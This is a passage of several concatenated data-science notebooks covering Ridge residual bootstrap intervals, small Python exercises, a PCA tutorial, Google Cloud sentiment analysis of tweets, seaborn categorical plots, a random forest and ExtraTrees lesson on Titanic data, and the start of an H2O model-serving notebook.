### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###
pred_train = cross_val_predict(Ridge(**model.best_params_), X_train, y_train, cv=3)
res = y_train - pred_train
### PLOT RESIDUAL STATISTICS ###
plt.figure(figsize=(16,5))
plt.subplot(1,2,1)
plt.title('Residuals Distribution')
plt.hist(res, bins=20)
plt.subplot(1,2,2)
plt.title('Residuals Autocorrelation')
plt.plot([res.autocorr(lag=dt) for dt in range(1,200)])
plt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')
plt.ylabel('Autocorrelation'); plt.xlabel('Lags')
plt.show()
### BOOTSTRAPPED INTERVALS ###
alpha = 0.05
bootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])
q_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)
y_pred = pd.Series(model.predict(X_test), index=X_test.index)
y_lower = y_pred + q_bootstrap[0].mean()
y_upper = y_pred + q_bootstrap[1].mean()
### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###
plt.figure(figsize=(10,6))
y_pred.plot(linewidth=3)
y_test.plot(style='.k', alpha=0.5)
plt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)
plt.title('Ridge test predictions')
### HOW MANY OUTLIERS IN TEST DATA ###
((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]
```
---
**Question1**
<br>Create a function that takes three integer arguments (a, b, c) and returns the number of
integers that are of equal value.
<br>Examples
<br>equal(3, 4, 3) ➞ 2
<br>equal(1, 1, 1) ➞ 3
<br>equal(3, 4, 1) ➞ 0
<br>
<br>Notes
<br>Your function must return 0, 2 or 3.
**Answer:**
```
def equal(a, b, c):
from collections import Counter
temp_dict = dict(Counter([a, b, c]))
temp_list = [temp_dict[i] for i in temp_dict if temp_dict[i]>1]
if len(temp_list) == 0:
return 0
else:
return temp_list[0]
for a, b, c in [(3, 4, 3), (1, 1, 1), (3, 4, 1)]:
print(equal(a, b, c))
```
**Question2**
<br>Write a function that converts a dictionary into a list of (key, value) tuples.
<br>Examples
<br>dict_to_list({
<br>"D": 1,
<br>"B": 2,
<br>"C": 3
<br>}) ➞ [("B", 2), ("C", 3), ("D", 1)]
<br>dict_to_list({
<br>"likes": 2,
<br>"dislikes": 3,
<br>"followers": 10
<br>}) ➞ [("dislikes", 3), ("followers", 10), ("likes", 2)]
<br>
<br>Notes
<br>Return the elements in the list in alphabetical order.
**Answer:**
```
def dict_to_list(x):
return sorted(x.items(), key=lambda k: k[0])
for x in [{"D": 1, "B": 2, "C": 3}, {"likes": 2, "dislikes": 3, "followers": 10}]:
print(dict_to_list(x))
```
**Question3**
<br>Write a function that creates a dictionary with each (key, value) pair being the (lower case,
upper case) versions of a letter, respectively.
<br>**Examples**
<br>mapping(["p", "s"]) ➞ { "p": "P", "s": "S" }
<br>mapping(["a", "b", "c"]) ➞ { "a": "A", "b": "B", "c": "C" }
<br>mapping(["a", "v", "y", "z"]) ➞ { "a": "A", "v": "V", "y": "Y", "z": "Z" }
<br>
<br>Notes
<br>All of the letters in the input list will always be lowercase.
**Answer:**
```
def mapping(x):
return {i: i.upper() for i in x}
for x in [["p", "s"], ["a", "b", "c"], ["a", "v", "y", "z"]]:
print(mapping(x))
```
**Question4**
<br>Write a function that replaces all vowels in a string with a specified vowel.
<br>**Examples**
<br>vow_replace("apples and bananas", "u") ➞ "upplus und bununus"
<br>vow_replace("cheese casserole", "o") ➞ "chooso cossorolo"
<br>vow_replace("stuffed jalapeno poppers", "e") ➞ "steffed jelepene peppers"
<br>
<br>Notes
<br>All words will be lowercase. Y is not considered a vowel.
**Answer:**
```
def vow_replace(x_text, x_vowel):
temp_list = [x_vowel if i in ['a', 'e', 'i', 'o', 'u']
else i for i in list(x_text)]
return ''.join(temp_list)
for x_text, x_vowel in [("apples and bananas", "u"),
("cheese casserole", "o"),
("stuffed jalapeno poppers", "e")]:
print(vow_replace(x_text, x_vowel))
```
**Question5**
<br>Create a function that takes a string as input and capitalizes a letter if its ASCII code is even
and returns its lower case version if its ASCII code is odd.
<br>**Examples**
<br>ascii_capitalize("to be or not to be!") ➞ "To Be oR NoT To Be!"
<br>ascii_capitalize("THE LITTLE MERMAID") ➞ "THe LiTTLe meRmaiD"
<br>ascii_capitalize("Oh what a beautiful morning.") ➞ "oH wHaT a BeauTiFuL
moRNiNg."
**Answer:**
```
def ascii_capitalize(x):
temp_list = [i.upper() if ord(i)%2==0 else i.lower() for i in list(x)]
return ''.join(temp_list)
for x in ["to be or not to be!", "THE LITTLE MERMAID", "Oh what a beautiful morning."]:
print(ascii_capitalize(x))
```
---
# PCA (Principal Component Analysis)
---
<img src="https://selecao.letscode.com.br/favicon.png" width="40px" style="position: absolute; top: 15px; right: 40px; border-radius: 5px;" />
## Introduction
Data sets with a large number of explanatory variables are increasingly common, but the more variables there are, the harder it becomes to interpret a solution. Principal Component Analysis (PCA) is a technique for reducing the dimensionality of such data sets, increasing interpretability while minimizing the loss of information. It does this by creating new, uncorrelated variables that preserve as much of the variability as possible. Preserving as much variability as possible translates into finding new variables that are linear functions of those in the original data set.
In linear regression we usually determine the single line that best fits the data set; in PCA, we determine several lines, mutually orthogonal in n-dimensional space, that best fit the data set. Orthogonal means that these lines are at right angles to one another. The number of dimensions equals the number of variables; for example, a data set with 3 variables spans a three-dimensional space.
Principal component analysis is essentially just a coordinate transformation. With two-dimensional data, for instance, the original data are plotted on an X axis and a Y axis. PCA rotates these axes so that the new X' axis lies along the direction of maximum variation in the data. Since the technique requires the axes to be perpendicular, in two dimensions the choice of X' determines Y'. The transformed data are obtained by reading the x and y values off this new pair of axes, X' and Y'. For more than two dimensions, the first axis points in the direction of greatest variation; the second, in the direction of the second greatest variation; and so on.
<img src="https://miro.medium.com/max/2625/1*ba0XpZtJrgh7UpzWcIgZ1Q.jpeg" alt="" width="40%" style="display: block; margin: 20px auto;" />
## Procedure for a principal component analysis
Consider the matrix $X_{n \times p}$ containing observations of $p$ characteristics of $n$ individuals from a population. The observed characteristics are represented by the variables $X_1, X_2, X_3, \cdots, X_p$.
$$
X = \left [ \begin{array}{ccccc}
x_{11} & x_{12} & x_{13} & \cdots & x_{1p}\\
x_{21} & x_{22} & x_{23} & \cdots & x_{2p}\\
\vdots & \vdots & \vdots & \cdots & \vdots \\
x_{n1} & x_{n2} & x_{n3} & \cdots & x_{np}\\
\end{array} \right ]
$$
### Step 1
For data in which the variables $X_i$ are on different scales (for example, $X_1$ represents the price of a car and $X_2$ its fuel consumption), the data must be standardized. This is because the components are influenced by the scale of the variables, precisely because the covariance matrices, $\Sigma$ or $\hat{\Sigma} = S$, are sensitive to the scale of a pair of variables. Let $\bar{x_j}$ be the mean of variable $X_j$ and $s(X_j)$ its standard deviation, with $i = 1, 2, 3, \cdots, n$ and $j = 1, 2, 3, \cdots, p$. Standardization can then be performed using the equation below:
- Mean 0 and standard deviation 1:
$$ x'_{ij}= \frac{x_{ij}-\bar{X_j}}{s(X_j)} $$
<br>
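As a quick illustration (a sketch with made-up numbers, not part of the original material), the standardization formula can be applied directly with NumPy; note that the sample standard deviation (`ddof=1`) is used here, matching $s(X_j)$ above:

```python
import numpy as np

# Hypothetical data matrix: n = 4 individuals, p = 2 variables on different scales
X = np.array([[30000.0, 10.0],
              [45000.0,  8.0],
              [25000.0, 12.0],
              [50000.0,  7.0]])

# x'_ij = (x_ij - mean of column j) / sample standard deviation of column j
X_std = (X - X.mean(axis=0)) / X.std(axis=0, ddof=1)

print(X_std.mean(axis=0))          # each column now has mean ~0
print(X_std.std(axis=0, ddof=1))   # and standard deviation 1
```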
### Step 2
Compute the **covariance** or **correlation** matrix. If the variables are on different scales, the correlation matrix can be computed on the original data instead. This works because the covariance matrix of the standardized variables equals the correlation matrix of the original variables.
$$
S = \left [ \begin{array}{ccccc}
\hat{Var}(x_1) & \hat{Cov}(x_1x_2) & \hat{Cov}(x_1x_3) & \cdots & \hat{Cov}(x_1x_p)\\
\hat{Cov}(x_2x_1) &\hat{Var}(x_2)& \hat{Cov}(x_2x_3) & \cdots & \hat{Cov}(x_2x_p)\\
\vdots & \vdots & \vdots & \cdots & \vdots \\
\hat{Cov}(x_px_1) & \hat{Cov}(x_px_2) & \hat{Cov}(x_px_3) & \cdots & \hat{Var}(x_p)\\
\end{array} \right ]
$$
<br>
<br>
$$
R = \left [ \begin{array}{ccccc}
1 & r(x_1x_2) & r(x_1x_3) & \cdots & r(x_1x_p)\\
r(x_2x_1) & 1 & r(x_2x_3) & \cdots & r(x_2x_p)\\
\vdots & \vdots & \vdots & \cdots & \vdots \\
r(x_px_1) & r(x_px_2) & r(x_px_3) & \cdots & 1\\
\end{array} \right ]
$$
Where:
$$
\begin{array}{ccc}
\hat{Var}(x_j) = \frac{\sum_{i=1}^{n}(x_{ij}-\bar{x}_j)^2}{n-1}, &
\hat{Cov}(x_{j1},x_{j2}) = \frac{\sum_{i=1}^n(x_{ij1}-\bar{x_{j1}})(x_{ij2}-\bar{x_{j2}})}{n-1}, &
r(x_{j1},x_{j2}) = \frac{\hat{Cov}(x_{j1},x_{j2})}{S_{xj1}S_{xj2}}
\end{array}
$$
<br>
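Both matrices can be computed directly in NumPy, and we can confirm the claim above that the covariance matrix of the standardized data equals the correlation matrix of the original data (an illustrative sketch on random data):

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(100, 3))          # hypothetical data: n = 100, p = 3
X_std = (X - X.mean(axis=0)) / X.std(axis=0, ddof=1)

S = np.cov(X_std, rowvar=False)        # covariance matrix of the standardized data
R = np.corrcoef(X, rowvar=False)       # correlation matrix of the original data

# Covariance of the standardized variables == correlation of the originals
print(np.allclose(S, R))
```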
### Step 3
The principal components are determined from the characteristic equation of the matrix S or R:
$$det[R - \lambda I]= 0 $$
where $I$ is the identity matrix of dimension $p\times p$.
If R or S has full rank $p$, then $det[R - \lambda I]= 0$, which can be rewritten as $\mid R - \lambda I \mid = 0$, has $p$ solutions. Recall that full rank means no column is a linear combination of another.
Let $\lambda_1,\lambda_2,\lambda_3, \cdots, \lambda_p$ be the roots of the characteristic equation of R or S; then $\lambda_1 > \lambda_2 > \lambda_3 > \cdots > \lambda_p$. Each $\lambda_i$ is called an eigenvalue, and each eigenvalue has an associated eigenvector $\tilde{a}_i$.
$$
\tilde{a}_i = \left [ \begin{array}{c}
a_{i1}\\
a_{i2}\\
\vdots \\
a_{ip} \\
\end{array} \right ]
$$
The eigenvector $\tilde{a}_i$ can be computed using the following property:
$$ R\tilde{a}_i = \lambda_i \tilde{a}_i $$
This result must be normalized:
$$ a_i = \frac{\tilde{a}_i }{\mid \tilde{a}_i \mid}$$
so that the sum of the squared coefficients equals 1 and the eigenvectors are orthogonal to one another.
<br>
### Step 4
The i-th principal component is given by:
$$Z_i = a_{i1}X_1 + a_{i2}X_2 + a_{i3}X_3 + \cdots + a_{ip}X_p $$
where the $a_{ij}$ are the components of the eigenvector $a_i$ associated with the eigenvalue $\lambda_i$.
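Steps 3 and 4 can be sketched with NumPy's eigendecomposition (illustrative only, on random data; the sklearn workflow later in this notebook wraps all of this):

```python
import numpy as np

rng = np.random.default_rng(42)
X = rng.normal(size=(50, 3))                       # hypothetical data matrix
X_std = (X - X.mean(axis=0)) / X.std(axis=0, ddof=1)

R = np.corrcoef(X, rowvar=False)                   # Step 2: correlation matrix

# Step 3: solve det[R - lambda*I] = 0 -> eigenvalues and eigenvectors
eigvals, eigvecs = np.linalg.eigh(R)               # eigh: R is symmetric
order = np.argsort(eigvals)[::-1]                  # sort lambda_1 > lambda_2 > ...
eigvals, eigvecs = eigvals[order], eigvecs[:, order]
# numpy already returns eigenvectors normalized to unit length

# Step 4: Z_i = a_i1*X_1 + a_i2*X_2 + ... + a_ip*X_p for each component i
Z = X_std @ eigvecs
print(eigvals)                                     # variance captured by each component
```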
## Loading the Dataset and Performing an Exploratory Data Analysis
---
```
# Libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.datasets import load_breast_cancer
# Loading the breast cancer dataset
data = load_breast_cancer()
type(data)
data['data']
pd.DataFrame(data['data'])
data.keys()
data['feature_names']
df = pd.DataFrame(data['data'], columns=data['feature_names'])
df.head()
data['target']
df.head()
df['target'] = data['target']
df.head()
```
### Step 1: Standardizing our dataset
```
# Keeping only the features to be transformed (X)
X = df.drop('target', axis=1)
X.head()
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(X)  # fit computes the mean and variance of each variable
scaler.mean_
scaler.var_
X_scaled = scaler.transform(X)
X_scaled  # transformed to mean ZERO and standard deviation ONE
pd.DataFrame(X_scaled).describe()
```
### Summarizing the use of StandardScaler...
```
# ANOTHER, FASTER WAY!!
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
X_scaled
```
### Step 2: Compute the covariance matrix [...]
### Using the sklearn library
1. Standardize the *features*
2. Apply PCA
#### Applying PCA
https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html
```
from sklearn.decomposition import PCA
pca = PCA()
pca.fit(X_scaled)  # this fit computes the new axes
```
#### Obtendo a matriz de dados transformada
```
X_pca = pca.transform(X_scaled)  # project the data onto the new axes
X_pca  # the features converted to the new axes, with new values
X.head()  # original features
X_pca = pd.DataFrame(X_pca, columns=[f'C{i}' for i in range(1, X.shape[1] + 1)])
X_pca
```
#### Analyzing the explained variance
```
pca.explained_variance_
pca.explained_variance_ratio_  # variance as a fraction of the total
pca.explained_variance_ratio_.cumsum()  # cumulative sum
plt.figure(figsize=(20, 8))
plt.plot(X_pca.columns, pca.explained_variance_ratio_.cumsum())
plt.bar(X_pca.columns, pca.explained_variance_ratio_)
```
#### Performing the inverse transform
```
pd.DataFrame(X_scaled)
X_inverted = pca.inverse_transform(X_pca)
pd.DataFrame(X_inverted)
X_original = scaler.inverse_transform(X_inverted)
pd.DataFrame(X_original)
X.head()
```
### Applying PCA with a reduced number of components
```
pca = PCA(n_components=0.95)  # keep enough components to retain 95% of the variance in the original data
X_pca_optimized = pca.fit_transform(X_scaled)
X_pca_optimized.shape
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/Estampille/Cognitive-Services-Vision-Solution-Templates/blob/master/googlesentiments.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
!pip install --upgrade google-api-python-client
!pip install google-cloud-language
!pip3 install --upgrade google-cloud-storage
!pip install --upgrade pip
!pip install word2number
!pip install contractions
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
from google.colab import auth
from oauth2client.client import GoogleCredentials
import argparse
from google.cloud import language_v1
```
attribution sheet
```
from google.colab import auth
auth.authenticate_user()
import gspread
from oauth2client.client import GoogleCredentials
gc = gspread.authorize(GoogleCredentials.get_application_default())
sh = gc.open('COUNTERPOINT_extrait_tweet')
shfr = sh.worksheet('climate fr')
```
pre-processing data
```
from bs4 import BeautifulSoup
import spacy
import re
from word2number import w2n
import contractions
def strip_html_tags(text):
    """Remove URLs, hashtags, HTML tags and stray punctuation from text."""
    linkr = re.sub(r"http\S+", "", text)
    hashr = re.sub(r"#", "", linkr)
    result = (hashr.replace("\\n", " ").replace("\\", "").replace("-", " ")
              .replace("@", "").replace("\"", "").replace("é", "e")
              .replace("è", "e").replace("'", " ").replace("’", " "))
    soup = BeautifulSoup(result, "html.parser")
    return soup.get_text(separator=" ")

shfr_html = []
for i in range(20):
    text = "{}".format(shfr.cell(i + 2, 4).value)
    shfr_html.append(strip_html_tags(text))
print(shfr_html[7])
```
sentiment analyze
```
from google.cloud import language
from google.cloud.language import enums
from google.cloud.language import types
from google.oauth2 import service_account
credentials = service_account.Credentials.from_service_account_file('apikey.json')
client = language.LanguageServiceClient(credentials=credentials)
def tweet(client, text):
    """Run sentiment analysis on one tweet and return the labelled results."""
    results = []
    document = types.Document(
        content=text,
        type=enums.Document.Type.PLAIN_TEXT)
    sentiment = client.analyze_sentiment(document=document).document_sentiment
    if sentiment.score < 0:
        results.append("négatif")
    elif sentiment.score > 0:
        results.append("positif")
    else:
        results.append("mixe ou incertain")
    results.append('Text: {} '.format(text))
    results.append(' Sentiment: {}, Magnitude: {}'.format(sentiment.score, sentiment.magnitude))
    print(results)
    print(sentiment)
    return results

for i in range(10):
    result = tweet(client, shfr_html[i])
    shfr.update_cell(i + 2, 11, ' '.join(result))
```
|
github_jupyter
|
# Plotting Categorical Data
In this section, we will:
- Plot distributions of data across categorical variables
- Plot aggregate/summary statistics across categorical variables
## Plotting Distributions Across Categories
We have seen how to plot distributions of data. Often, the distributions reveal new information when you plot them across categorical variables.
Let's see some examples.
```
# loading libraries and reading the data
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# set seaborn theme if you prefer
sns.set(style="white")
# read data
market_df = pd.read_csv("./global_sales_data/market_fact.csv")
customer_df = pd.read_csv("./global_sales_data/cust_dimen.csv")
product_df = pd.read_csv("./global_sales_data/prod_dimen.csv")
shipping_df = pd.read_csv("./global_sales_data/shipping_dimen.csv")
orders_df = pd.read_csv("./global_sales_data/orders_dimen.csv")
```
### Boxplots
We had created simple boxplots such as the one shown below. Now, let's plot multiple boxplots and see what they can tell us about the distribution of variables across categories.
```
# boxplot of a variable
sns.boxplot(y=market_df['Sales'])
plt.yscale('log')
plt.show()
```
Now, let's say you want to **compare the (distribution of) sales of various product categories**. Let's first merge the product data into the main dataframe.
```
# merge the dataframe to add a categorical variable
df = pd.merge(market_df, product_df, how='inner', on='Prod_id')
df.head()
# boxplot of a variable across various product categories
sns.boxplot(x='Product_Category', y='Sales', data=df)
plt.yscale('log')
plt.show()
```
So this tells you that the sales of office supplies are, on average, lower than those of the other two categories. The sales of the technology and furniture categories seem much better. Note that each order can contain multiple units of a product, so higher/lower Sales may be due to the price per unit or the number of units.
Let's now plot the other important variable - Profit.
```
# boxplot of a variable across various product categories
sns.boxplot(x='Product_Category', y='Profit', data=df)
plt.show()
```
Profit clearly has some *outliers* due to which the boxplots are unreadable. Let's remove some extreme values from Profit (for the purpose of visualisation) and try plotting.
```
df = df[(df.Profit<1000) & (df.Profit>-1000)]
# boxplot of a variable across various product categories
sns.boxplot(x='Product_Category', y='Profit', data=df)
plt.show()
```
You can see that though the category 'Technology' has better sales numbers than others, it is also the one where the **most loss making transactions** happen. You can drill further down into this.
```
# adjust figure size
plt.figure(figsize=(10, 8))
# subplot 1: Sales
plt.subplot(1, 2, 1)
sns.boxplot(x='Product_Category', y='Sales', data=df)
plt.title("Sales")
plt.yscale('log')
# subplot 2: Profit
plt.subplot(1, 2, 2)
sns.boxplot(x='Product_Category', y='Profit', data=df)
plt.title("Profit")
plt.show()
```
Now that we've compared Sales and Profits across product categories, let's drill down further and do the same across **another categorical variable** - Customer_Segment.
We'll need to add the customer-related attributes (dimensions) to this dataframe.
```
# merging with customers df
df = pd.merge(df, customer_df, how='inner', on='Cust_id')
df.head()
# boxplot of a variable across various product categories
sns.boxplot(x='Customer_Segment', y='Profit', data=df)
plt.show()
```
You can **visualise the distribution across two categorical variables** using the ```hue= ``` argument.
```
# set figure size for larger figure
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
# specify hue="categorical_variable"
sns.boxplot(x='Customer_Segment', y='Profit', hue="Product_Category", data=df)
plt.show()
```
Across all customer segments, the product category ```Technology``` seems to be doing fairly well, though ```Furniture``` is incurring losses across all segments.
Now say you are curious to know why certain orders are making huge losses. One of your hypothesis is that the *shipping cost is too high in some orders*. You can **plot derived variables** as well, such as *shipping cost as percentage of sales amount*.
```
# plot shipping cost as percentage of Sales amount
sns.boxplot(x=df['Product_Category'], y=100*df['Shipping_Cost']/df['Sales'])
plt.ylabel("100*(Shipping cost/Sales)")
plt.show()
```
## Plotting Aggregated Values across Categories
### Bar Plots - Mean, Median and Count Plots
Bar plots are used to **display aggregated values** of a variable, rather than entire distributions. This is especially useful when you have a lot of data which is difficult to visualise in a single figure.
For example, say you want to visualise and *compare the average Sales across Product Categories*. The ```sns.barplot()``` function can be used to do that.
```
# bar plot with default statistic=mean
sns.barplot(x='Product_Category', y='Sales', data=df)
plt.show()
```
Note that, **by default, seaborn plots the mean value across categories**, though you can plot the count, median, sum etc. `barplot` also computes and shows the confidence interval of the mean.
```
# Create 2 subplots for mean and median respectively
# increase figure size
plt.figure(figsize=(12, 6))
# subplot 1: statistic=mean
plt.subplot(1, 2, 1)
sns.barplot(x='Product_Category', y='Sales', data=df)
plt.title("Average Sales")
# subplot 2: statistic=median
plt.subplot(1, 2, 2)
sns.barplot(x='Product_Category', y='Sales', data=df, estimator=np.median)
plt.title("Median Sales")
plt.show()
```
Look at that! The mean and median sales across the product categories tell different stories. This is because of some outliers (extreme values) in the ```Furniture``` category, distorting the value of the mean.
You can add another categorical variable in the plot.
```
# set figure size for larger figure
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
# specify hue="categorical_variable"
sns.barplot(x='Customer_Segment', y='Profit', hue="Product_Category", data=df, estimator=np.median)
plt.show()
```
The plot neatly shows the median profit across product categories and customer segments. It says that:
- On average, only Technology products in the Small Business and Corporate customer segments are profitable.
- Furniture is incurring losses across all Customer Segments
Compare this to the boxplot we had created above - though the bar plot contains less information than the boxplot, it is more revealing.
<hr>
When you have a large number of categories to visualise, it is helpful to plot them along the y-axis. Let's now *drill down into product sub-categories*.
```
# Plotting categorical variable across the y-axis
plt.figure(figsize=(10, 8))
sns.barplot(x='Profit', y="Product_Sub_Category", data=df, estimator=np.median)
plt.show()
```
The plot clearly shows which sub-categories are incurring the heaviest losses - Copiers and Fax, Tables, Chairs and Chairmats are the most loss-making categories.
You can also plot the **count of the observations** across categorical variables using ```sns.countplot()```.
```
# Plotting count across a categorical variable
plt.figure(figsize=(10, 8))
sns.countplot(y="Product_Sub_Category", data=df)
plt.show()
```
Note that the most loss-making category - Copiers and Fax - has very few orders.
In the next section, we will see how to plot Time Series data.
## Additional Stuff on Plotting Categorical Variables
1. <a href="https://seaborn.pydata.org/tutorial/categorical.html">Seaborn official tutorial on categorical variables</a>
|
github_jupyter
|
<img src="https://maltem.com/wp-content/uploads/2020/04/LOGO_MALTEM.png" style="float: left; margin: 20px; height: 55px">
<br>
<br>
<br>
<br>
# Random Forests and ExtraTrees
_Authors: Matt Brems (DC), Riley Dallas (AUS)_
---
## Random Forests
---
With bagged decision trees, we generate many different trees on pretty similar data. These trees are **strongly correlated** with one another, so averaging them does little to reduce variance. Looking at the variance of the average of two random variables $T_1$ and $T_2$:
$$
\begin{eqnarray*}
Var\left(\frac{T_1+T_2}{2}\right) &=& \frac{1}{4}\left[Var(T_1) + Var(T_2) + 2Cov(T_1,T_2)\right]
\end{eqnarray*}
$$
If $T_1$ and $T_2$ are highly correlated, then the variance will be about as high as we'd see with individual decision trees. By "de-correlating" our trees from one another, we can drastically reduce the variance of our model.
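As a sanity check (a simulation sketch, not part of the original lesson), we can verify numerically that for two unit-variance estimators with correlation $\rho$, the variance of their average is $(1+\rho)/2$:

```python
import numpy as np

rng = np.random.default_rng(0)
n_sims = 100_000

# Two estimators T1, T2, each with Var = 1, at two correlation levels
for rho in (0.0, 0.9):
    cov = np.array([[1.0, rho], [rho, 1.0]])
    T = rng.multivariate_normal([0.0, 0.0], cov, size=n_sims)
    avg = T.mean(axis=1)
    # Theory: Var((T1 + T2)/2) = (1/4)(1 + 1 + 2*rho) = (1 + rho)/2
    print(rho, avg.var(), (1 + rho) / 2)
```

With `rho = 0.9` the averaging barely helps, which is exactly why de-correlating the trees matters.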
That's the difference between bagged decision trees and random forests! We're going to do the same thing as before, but we're going to de-correlate our trees. This will reduce our variance (at the expense of a small increase in bias) and thus should greatly improve the overall performance of the final model.
So how do we "de-correlate" our trees?
Random forests differ from bagging decision trees in only one way: they use a modified tree learning algorithm that selects, at each split in the learning process, a **random subset of the features**. This process is sometimes called the *random subspace method*.
The reason for doing this is the correlation of the trees in an ordinary bootstrap sample: if one or a few features are very strong predictors for the response variable (target output), these features will be used in many/all of the bagged decision trees, causing them to become correlated. By selecting a random subset of features at each split, we counter this correlation between base trees, strengthening the overall model.
For a problem with $p$ features, it is typical to use:
- $\sqrt{p}$ (rounded down) features in each split for a classification problem.
- $p/3$ (rounded down) with a minimum node size of 5 as the default for a regression problem.
While this is a guideline, Hastie and Tibshirani (authors of Introduction to Statistical Learning and Elements of Statistical Learning) have suggested this as a good rule in the absence of some rationale to do something different.
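In scikit-learn these rules map onto the `max_features` parameter; the sketch below uses synthetic data, and the specific values are illustrative assumptions rather than part of this lesson:

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor

# Synthetic classification data with p = 9 features
X, y = make_classification(n_samples=200, n_features=9, random_state=0)

# Classification: consider sqrt(p) randomly chosen features at each split
clf = RandomForestClassifier(n_estimators=100, max_features="sqrt", random_state=0)
clf.fit(X, y)
print(clf.score(X, y))

# Regression rule of thumb: p/3 features, passed here as a fraction of p
reg = RandomForestRegressor(n_estimators=100, max_features=1/3, random_state=0)
```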
Random forests, a step beyond bagged decision trees, are **very widely used** classifiers and regressors. They are relatively simple to use because they require very few parameters to set and they perform pretty well.
- It is quite common for interviewers to ask how a random forest is constructed or how it is superior to a single decision tree.
---
## Extremely Randomized Trees (ExtraTrees)
Adding another step of randomization (and thus de-correlation) yields extremely randomized trees, or _ExtraTrees_. Like Random Forests, these are trained using the random subspace method (sampling of features). However, they are trained on the entire dataset instead of bootstrapped samples. A layer of randomness is introduced in the way the nodes are split. Instead of computing the locally optimal feature/split combination (based on, e.g., information gain or the Gini impurity) for each feature under consideration, a random value is selected for the split. This value is selected from the feature's empirical range.
This further reduces the variance, but causes an increase in bias. If you're considering using ExtraTrees, you might consider this to be a hyperparameter you can tune. Build an ExtraTrees model and a Random Forest model, then compare their performance!
That's exactly what we'll do below.
## Import libraries
---
We'll need the following libraries for today's lecture:
- `pandas`
- `numpy`
- `GridSearchCV`, `train_test_split` and `cross_val_score` from `sklearn`'s `model_selection` module
- `RandomForestClassifier` and `ExtraTreesClassifier` from `sklearn`'s `ensemble` module
```
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.model_selection import cross_val_score, train_test_split, GridSearchCV
```
## Load Data
---
Load `train.csv` and `test.csv` from Kaggle into `DataFrames`.
```
train = pd.read_csv('../datasets/train.csv')
test = pd.read_csv('../datasets/test.csv')
train.head()
train.shape
```
## Data Cleaning: Drop the two rows with missing `Embarked` values from train
---
```
train = train[train['Embarked'].notnull()]
train.shape
train[train['Pclass'] == 3]
```
## Data Cleaning: `Fare`
---
The test set has one row with a missing value for `Fare`. Fill it with the average `Fare` with everyone from the same `Pclass`. **Use the training set to calculate the average!**
```
mean_fare_3 = train[train['Pclass'] == 3]['Fare'].mean()
mean_fare_3
test['Fare'] = test['Fare'].fillna(mean_fare_3)
test.isnull().sum()
```
## Data Cleaning: `Age`
---
Let's simply impute all missing ages to be **999**.
**NOTE**: This is not a best practice. However,
1. Since we haven't really covered imputation in depth
2. And the proper way would take too long to implement (thus detracting) from today's lecture
3. And since we're ensembling with Decision Trees
We'll do it this way as a matter of convenience.
```
train['Age'] = train['Age'].fillna(999)
test['Age'] = test['Age'].fillna(999)
```
## Feature Engineering: `Cabin`
---
Since there are so many missing values for `Cabin`, let's binarize that column as follows:
- 1 if there originally was a value for `Cabin`
- 0 if it was null
**Do this for both `train` and `test`**
```
train['Cabin'] = train['Cabin'].notnull().astype(int)
test['Cabin'] = test['Cabin'].notnull().astype(int)
```
## Feature Engineering: Dummies
---
Dummy the `Sex` and `Embarked` columns. Be sure to set `drop_first=True`.
```
train = pd.get_dummies(train, columns=['Sex', 'Embarked'], drop_first=True)
test = pd.get_dummies(test, columns=['Sex', 'Embarked'], drop_first=True)
```
## Model Prep: Create `X` and `y` variables
---
Our features will be:
- `Pclass`
- `Age`
- `SibSp`
- `Parch`
- `Fare`
- `Cabin`
- `Sex_male`
- `Embarked_Q`
- `Embarked_S`
And our target will be `Survived`
```
features = ['Pclass', 'Age', 'SibSp', 'Parch', 'Fare', 'Cabin', 'Sex_male', 'Embarked_Q', 'Embarked_S']
X = train[features]
y = train['Survived']
```
## Challenge: What is our baseline accuracy?
---
The baseline accuracy is the percentage of the majority class, regardless of whether it is 1 or 0. It serves as the benchmark for our model to beat.
```
y.value_counts(normalize=True)
```
## Train/Test Split
---
I know it can be confusing having an `X_test` from our training data vs a test set from Kaggle. If you want, you can use `X_val`/`y_val` for what we normally call `X_test`/`y_test`.
```
X_train, X_val, y_train, y_val = train_test_split(X, y, random_state=42, stratify=y)
```
## Model instantiation
---
Create an instance of `RandomForestClassifier` and `ExtraTreesClassifier`.
```
rf = RandomForestClassifier(n_estimators=100)
et = ExtraTreesClassifier(n_estimators=100)
```
## Model Evaluation
---
Which one has a higher `cross_val_score`?
```
cross_val_score(rf, X_train, y_train, cv=5).mean()
cross_val_score(et, X_train, y_train, cv=5).mean()
```
## Grid Search
---
They're both pretty close performance-wise. We could Grid Search over both, but for the sake of time we'll go with `RandomForestClassifier`.
```
rf_params = {
'n_estimators': [100, 150, 200],
'max_depth': [None, 1, 2, 3, 4, 5],
}
gs = GridSearchCV(rf, param_grid=rf_params, cv=5)
gs.fit(X_train, y_train)
print(gs.best_score_)
gs.best_params_
gs.score(X_train, y_train)
gs.score(X_val, y_val)
```
## Kaggle Submission
---
Now that we've evaluated our model, let's submit our predictions to Kaggle.
```
pred = gs.predict(test[features])
test['Survived'] = pred
test[['PassengerId', 'Survived']].to_csv('submission.csv', index=False)
```
|
github_jupyter
|
# H2O Model
* Wrap a H2O model for use as a prediction microservice in seldon-core
* Run locally on Docker to test
* Deploy on seldon-core running on minikube
## Dependencies
